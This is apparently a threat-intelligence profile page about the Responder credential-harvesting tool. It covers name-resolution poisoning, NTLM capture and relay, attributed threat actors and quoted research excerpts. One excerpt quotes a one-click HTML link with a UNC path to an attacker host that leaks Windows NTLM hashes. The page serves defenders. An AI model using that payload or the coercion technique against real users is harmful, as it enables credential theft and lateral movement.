Responder is a publicly available adversary-in-the-middle credential harvesting tool used primarily on Windows-centric local networks. It is designed to poison and spoof name-resolution and related discovery protocols including LLMNR, NBT-NS, mDNS, and WPAD in order to coerce nearby systems into authenticating to an attacker-controlled host. By doing so, it captures NTLM authentication material, usernames, and password hashes, and can support NTLM relay and replay-style operations in downstream intrusion activity.
Responder is widely used as dual-use tooling by penetration testers and threat actors alike. It has been observed in operations attributed to APT28, Lazarus Group, and China-linked telecom intrusions, as well as in post-exploitation activity following exploitation of internet-facing systems. Reported use cases include NetBIOS Name Service poisoning, LLMNR poisoning, WPAD abuse, and credential collection on internal enterprise networks after initial compromise.
The tool is typically deployed after access to a foothold inside a victim environment and is used for credential access, internal reconnaissance support, and enabling lateral movement through harvested NTLM material. It is especially relevant in Active Directory environments where legacy name-resolution behavior and implicit authentication can be abused. Responder itself is best characterized as a credential-harvesting utility rather than standalone malware, but in intrusion reporting it is frequently cataloged alongside attacker toolsets because of its recurring operational role in post-compromise credential theft.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
These behaviors indicate that the server may have installed an LLMNR poisoning tool, such as Responder.
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
APT28 has obtained and used open-source tools like Koadic, Mimikatz, and Responder.
APT28 has obtained and used open-source tools like Koadic, Mimikatz, and Responder.
...using a mix of custom and public tools such as Microsocks, FRP, FScan, and Responder...
16 distinct techniques documented for this family, organized by ATT&CK tactic.
The TNEF file... contained an UNC path directing traffic to an SMB listener being hosted on a likely compromised Ubiquiti router.
During the analysis of the xHunt campaign activities, we identified a Kuwait government organization’s webpage used as an apparent watering hole.
For phishing delivery, the first shot is the only shot that matters. And yes, link-click works too… Figure 2: <a href="search:query=test&crumb=location:\\10.0.1.100\share">click</a> in Edge. One click, no prompt, hash on Responder. The threat model is "send a link."
Incoming connections to the malicious server result in the capture of password hashes, like the one below. The attacker can then attempt to crack the collected password hashes to facilitate lateral movement and/or privilege escalation.
An attacker may be able to capture it with tools like Responder, then use it in follow-on activity such as NTLM relay attacks or offline password-cracking attempts, depending on how the target environment is configured.
To access this remote file share, Windows will perform an NTLM challenge-response authentication attempt.
Similar to penetration testing techniques such as use of the Responder tool for capturing logon information, the technique prompts a victim machine to initiate an outbound Server Message Block (SMB) query to retrieve a remotely-hosted file object. As part of this communication, Windows authentication information (the username and NTLM hash) passes to the remote machine, which an intruder can capture for future replay.
The attacker uses a tool called ‘Response’ to manipulate the name services and collect the credentials and hash information on the local network
Similar to penetration testing techniques such as use of the Responder tool for capturing logon information, the technique prompts a victim machine to initiate an outbound Server Message Block (SMB) query to retrieve a remotely-hosted file object. As part of this communication, Windows authentication information (the username and NTLM hash) passes to the remote machine, which an intruder can capture for future replay.
3 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
12 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Credential harvesting tool used for LLMNR/NBT-NS/MDNS poisoning and capture of authentication material.
Responder is a tool for LLMNR, NBT-NS, and MDNS poisoning, capturing credentials and relaying them for lateral movement or privilege escalation.
Responder is referenced as an LLMNR poisoning tool likely used post-exploitation for internal reconnaissance and credential access activity.
A tool used to capture and relay credentials from network protocols, often used for lateral movement and privilege escalation.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.